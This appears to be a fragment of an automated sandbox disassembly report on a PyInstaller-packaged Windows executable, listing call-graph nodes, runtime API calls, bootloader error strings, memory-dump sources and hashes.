18019->18009 18021 7ff7333aa161 18020->18021 18022 7ff7333aa15d 18020->18022 18041 7ff7333b3cac GetEnvironmentStringsW 18021->18041 18022->17647 18033 7ff7333aa508 18022->18033 18025 7ff7333aa17a 18048 7ff7333aa2c8 18025->18048 18026 7ff7333aa16e 18027 7ff7333ab464 __free_lconv_mon 11 API calls 18026->18027 18027->18022 18030 7ff7333ab464 __free_lconv_mon 11 API calls 18031 7ff7333aa1a1 18030->18031 18032 
7ff7333ab464 __free_lconv_mon 11 API calls 18031->18032 18032->18022 18034 7ff7333aa52b 18033->18034 18039 7ff7333aa542 18033->18039 18034->17647 18035 7ff7333b0b10 MultiByteToWideChar _fread_nolock 18035->18039 18036 7ff7333afe04 _get_daylight 11 API calls 18036->18039 18037 7ff7333aa5b6 18038 7ff7333ab464 __free_lconv_mon 11 API calls 18037->18038 18038->18034 18039->18034 18039->18035 18039->18036 18039->18037 18040 7ff7333ab464 __free_lconv_mon 11 API calls 18039->18040 18040->18039 18042 7ff7333b3cd0 18041->18042 18043 7ff7333aa166 18041->18043 18044 7ff7333ae6c4 _fread_nolock 12 API calls 18042->18044 18043->18025 18043->18026 18046 7ff7333b3d07 memcpy_s 18044->18046 18045 7ff7333ab464 __free_lconv_mon 11 API calls 18047 7ff7333b3d27 FreeEnvironmentStringsW 18045->18047 18046->18045 18047->18043 18049 7ff7333aa2f0 18048->18049 18050 7ff7333afe04 _get_daylight 11 API calls 18049->18050 18056 7ff7333aa32b 18050->18056 18051 7ff7333ab464 __free_lconv_mon 11 API calls 18052 7ff7333aa182 18051->18052 18052->18030 18053 7ff7333aa3ad 18054 7ff7333ab464 __free_lconv_mon 11 API calls 18053->18054 18054->18052 18055 7ff7333afe04 _get_daylight 11 API calls 18055->18056 18056->18053 18056->18055 18057 7ff7333aa39c 18056->18057 18058 7ff7333b16e4 37 API calls 18056->18058 18061 7ff7333aa3d0 18056->18061 18064 7ff7333ab464 __free_lconv_mon 11 API calls 18056->18064 18065 7ff7333aa333 18056->18065 18059 7ff7333aa3e4 11 API calls 18057->18059 18058->18056 18060 7ff7333aa3a4 18059->18060 18062 7ff7333ab464 __free_lconv_mon 11 API calls 18060->18062 18063 7ff7333ab844 _isindst 17 API calls 18061->18063 18062->18065 18066 7ff7333aa3e2 18063->18066 18064->18056 18065->18051 18068 7ff7333b9da1 __crtLCMapStringW 18067->18068 18069 7ff7333b835e 18068->18069 18070 7ff7333b01d4 6 API calls 18068->18070 18069->17671 18069->17672 18070->18069 21361 7ff7333aacd0 21364 7ff7333aac48 21361->21364 21371 7ff7333b1548 EnterCriticalSection 21364->21371 21372 7ff7333abed0 21373 7ff7333abed5 
21372->21373 21377 7ff7333abeea 21372->21377 21378 7ff7333abef0 21373->21378 21379 7ff7333abf32 21378->21379 21380 7ff7333abf3a 21378->21380 21382 7ff7333ab464 __free_lconv_mon 11 API calls 21379->21382 21381 7ff7333ab464 __free_lconv_mon 11 API calls 21380->21381 21383 7ff7333abf47 21381->21383 21382->21380 21384 7ff7333ab464 __free_lconv_mon 11 API calls 21383->21384 21385 7ff7333abf54 21384->21385 21386 7ff7333ab464 __free_lconv_mon 11 API calls 21385->21386 21387 7ff7333abf61 21386->21387 21388 7ff7333ab464 __free_lconv_mon 11 API calls 21387->21388 21389 7ff7333abf6e 21388->21389 21390 7ff7333ab464 __free_lconv_mon 11 API calls 21389->21390 21391 7ff7333abf7b 21390->21391 21392 7ff7333ab464 __free_lconv_mon 11 API calls 21391->21392 21393 7ff7333abf88 21392->21393 21394 7ff7333ab464 __free_lconv_mon 11 API calls 21393->21394 21395 7ff7333abf95 21394->21395 21396 7ff7333ab464 __free_lconv_mon 11 API calls 21395->21396 21397 7ff7333abfa5 21396->21397 21398 7ff7333ab464 __free_lconv_mon 11 API calls 21397->21398 21399 7ff7333abfb5 21398->21399 21404 7ff7333abd9c 21399->21404 21418 7ff7333b1548 EnterCriticalSection 21404->21418 21420 7ff7333b26d0 21438 7ff7333b1548 EnterCriticalSection 21420->21438 21021 7ff7333bbe53 21022 7ff7333bbe63 21021->21022 21025 7ff7333a62e8 LeaveCriticalSection 21022->21025

Control-flow Graph (starting at 7ff733398020)
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorLastMessage$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                • API String ID: 4208240515-3165540532
                                                                                                                                                                                                                                                                                • Opcode ID: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                                                • Instruction ID: 558c70802ada2a0de58fdda866f7761b89b5f4cece57c0aa629a83d9a0aa3a5c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22D1A831A08B82E6EBA0AF74E8502BDB760FF84758F808239DA5D67695DF3CD145D720

Control-flow Graph (starting at 7ff7333b6e70)
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B6EB5
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B681C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB844: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7333AB823,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AB84D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB844: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7333AB823,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AB872
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B6EA4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B687C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B711A
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B712B
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B713C
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7333B737C), ref: 00007FF7333B7163
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                                • Opcode ID: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                                                • Instruction ID: 2b253d452e0636c53cb1e50e651d44e5f70d52eb3398e9e703a01b2b0dbb2069
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD1C126A08242A6EBB0FF25D4511B9B261EF84784FC4C13EEA4D67796DF3CE441A360

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                • Opcode ID: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                                                • Instruction ID: 4be630c3b55c8799796fad7ba020802e307c8489bfe119c0ffd646341d853ce7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C1D333B28A4195EBA0EF64D4806BC7771FB49B98B418239EE2E67794CF38D451D310

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                • Opcode ID: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                                                • Instruction ID: 7f03d80ac12270cbfd615bf6f29bc1af973018799cab9570462b9f5820e8df67
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8141A521A0C542E1EAB0BF24E4443BAA360FB94750FC0863AE99D636D8DF3CD60AD710

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B711A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B687C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B712B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B681C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B713C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B684C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7333B737C), ref: 00007FF7333B7163
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                                • Opcode ID: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                                                • Instruction ID: c67d91703417ee4cd06a9e8ec98aac1a7559f1855c36f9d2b8831c7355e2c4c8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23515022A18642A6E7B0FF21D8815A9B760FF48784FC0813DEA4D67796DF3CE4419760
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                • Opcode ID: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                                                • Instruction ID: 3354ab6eaeea542ae050f56bf2c885d837d36f1bd14aa4bb617024efb0bac867
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F0AF22A1C64296F7F09F60B8483AAB390FB84725F808239DA6E166D4CF3CD009DB10
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                • Opcode ID: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                                                • Instruction ID: 056e2f900d54cf4d1b89281764e492a90ad0c7f2348bf91e75ab0b20a2a94064
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4602AE22E1D64261FEF5BB169411279F294AF41B90FC5C63CDD6E663E2DE3CA441B320
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                                • API String ID: 2776309574-3325264605
                                                                                                                                                                                                                                                                                • Opcode ID: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                                                • Instruction ID: 1a0c4bd990c6623bda4db904a88ea6cd995b1e05d1b9f0a628b3e2bff9b32d85
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F428E61A0C682F1FAF5BB2094543F9E351AF44790FC4C03ADA9EA62D6DE3CE545E321

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333973D0: _fread_nolock.LIBCMT ref: 00007FF73339747A
                                                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF7333919FB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392020: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF733391B4A), ref: 00007FF733392070
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                • Opcode ID: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                                                • Instruction ID: 8797ec090de415976b6ed3ef7b715d301e1459f30e54137aa71331d3d4ebb82f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7816E31E0D686E5EBB0AB24D0417F9B3A1EF48784F80C03AD98D67795DE3CE545AB60

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                • Opcode ID: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                                                • Instruction ID: 0ee4e209adb5046230a4597d125abafd7a65a798850c2d0ea03bb50f9b0deec2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5519F21F08647B2EAB0BB1198006B9A3A0BF44794FC4C13AED5C777A6DE3CE555E320

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(FFFFFFFF,00000000,?,00007FF733393101), ref: 00007FF733397D44
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00007FF733393101), ref: 00007FF733397D4A
                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00007FF733393101), ref: 00007FF733397D8C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397E70: GetEnvironmentVariableW.KERNEL32(00007FF733392C4F), ref: 00007FF733397EA7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397E70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF733397EC9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333A9174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333A918D
                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                • API String ID: 365913792-1339014028
                                                                                                                                                                                                                                                                                • Opcode ID: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                                                • Instruction ID: 4c365e254bfc6b152705d70014c0ff583ac867c33c4a068192b9aa5230defd7d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C441A021B09682A1FAF0FB6598552F9A251AF857C0FC0D139ED0D777E6DE3CE901A720

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                • Opcode ID: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                                                • Instruction ID: d26fb609bf7147975b8a3e309dab5618d508b908c01835a99f8f7f8341e4858d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0351B622E08642E5EAF0BB11A4403BAA2A1FF49794FC4C139ED4D677D5EE3CE545E710

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7333B0316,?,?,-00000018,00007FF7333ABC5B,?,?,?,00007FF7333ABB52,?,?,?,00007FF7333A6EFE), ref: 00007FF7333B00F8
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7333B0316,?,?,-00000018,00007FF7333ABC5B,?,?,?,00007FF7333ABB52,?,?,?,00007FF7333A6EFE), ref: 00007FF7333B0104
                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
